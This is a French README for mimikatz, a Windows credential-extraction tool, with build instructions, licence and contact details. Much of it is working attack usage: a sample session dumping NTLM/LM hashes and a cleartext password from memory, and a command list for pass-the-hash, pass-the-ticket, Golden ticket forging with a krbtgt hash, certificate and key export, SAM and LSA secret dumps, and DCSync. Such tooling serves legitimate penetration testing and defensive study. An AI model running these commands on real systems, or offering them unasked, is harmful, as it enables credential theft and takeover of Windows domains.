
Un petit outil pour jouer avec la sécurité Windows
mimikatz est un outil que j'ai créé pour apprendre le C et faire quelques expériences avec la sécurité Windows.
Il est désormais bien connu pour extraire les mots de passe en clair, les hash, les codes PIN et les tickets kerberos de la mémoire. mimikatz peut également effectuer du pass-the-hash, du pass-the-ticket ou construire des Golden tickets.
.#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr 6 2014 22:02:03)
.## ^ ##.
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( [email protected] )
'## v ##' https://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with 13 modules * * */
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session : Interactive from 2
User Name : Gentil Kiwi
Domain : vm-w7-ult-x
SID : S-1-5-21-1982681256-1210654043-1600862990-1000
msv :
[00000003] Primary
* Username : Gentil Kiwi
* Domain : vm-w7-ult-x
* LM : d0e9aee149655a6075e4540af1f22d3b
* NTLM : cc36cf7a8514893efccd332446158b1a
* SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
tspkg :
* Username : Gentil Kiwi
* Domain : vm-w7-ult-x
* Password : waza1234/
...
Mais ce n'est pas tout ! Crypto, Terminal Server, Events, ... beaucoup d'informations dans le GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki ou sur https://blog.gentilkiwi.com (en français, oui).
Si vous ne voulez pas le compiler, les binaires sont disponibles sur https://github.com/gentilkiwi/mimikatz/releases
log
privilege::debug
sekurlsa::logonpasswords
sekurlsa::tickets /export
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
crypto::capi
crypto::cng
crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
crypto::keys /export
crypto::keys /machine /export
vault::cred
vault::list
token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert
lsadump::dcsync /user:domain\krbtgt /domain:lab.local
mimikatz se présente sous la forme d'une solution Visual Studio et d'un pilote WinDDK (optionnel pour les opérations principales), les prérequis sont donc :
mimikatz et mimilib : Visual Studio 2010, 2012 ou 2013 pour Bureau (2013 Express pour Bureau est gratuit et supporte x86 & x64 - http://www.microsoft.com/download/details.aspx?id=44914)mimikatz driver, mimilove (et la plateforme ddk2003) : Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800mimikatz utilise SVN pour le contrôle de source, mais est désormais disponible avec GIT aussi !
Vous pouvez utiliser n'importe quel outil pour synchroniser, même le GIT intégré dans Visual Studio 2013 =)
Build / Build Solution (vous pouvez changer l'architecture)mimikatz est maintenant compilé et prêt à être utilisé ! (Win32 / x64 voire ARM64 si vous avez de la chance)
MSB3073 concernant _build_.cmd et mimidrv, c'est parce que le pilote ne peut pas être compilé sans Windows Driver Kit 7.1 (WinDDK), mais mimikatz et mimilib sont OK.Avec cette plateforme MSBuild optionnelle, vous pouvez utiliser les outils de compilation WinDDK, et le runtime msvcrt par défaut (binaires plus petits, aucune dépendance)
Pour cette plateforme optionnelle, Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 et Visual Studio 2010 sont obligatoires, même si vous prévoyez d'utiliser Visual Studio 2012 ou 2013 ensuite.
Suivez les instructions :
Le projet mimikatz est disponible sur AppVeyor - https://ci.appveyor.com/project/gentilkiwi/mimikatz
Son statut est :
Licence CC BY 4.0 - https://creativecommons.org/licenses/by/4.0/
mimikatz a besoin de café pour être développé :
gentilkiwi, vous pouvez me contacter sur Twitter ( @gentilkiwi ) ou par mail ( benjamin [at] gentilkiwi.com )lsadump ont été co-écrites avec Vincent LE TOUX, vous pouvez le contacter par mail ( vincent.letoux [at] gmail.com ) ou visiter son site web ( http://www.mysmartlogon.com )Ceci est un développement personnel, veuillez respecter sa philosophie et ne l'utilisez pas pour de mauvaises choses !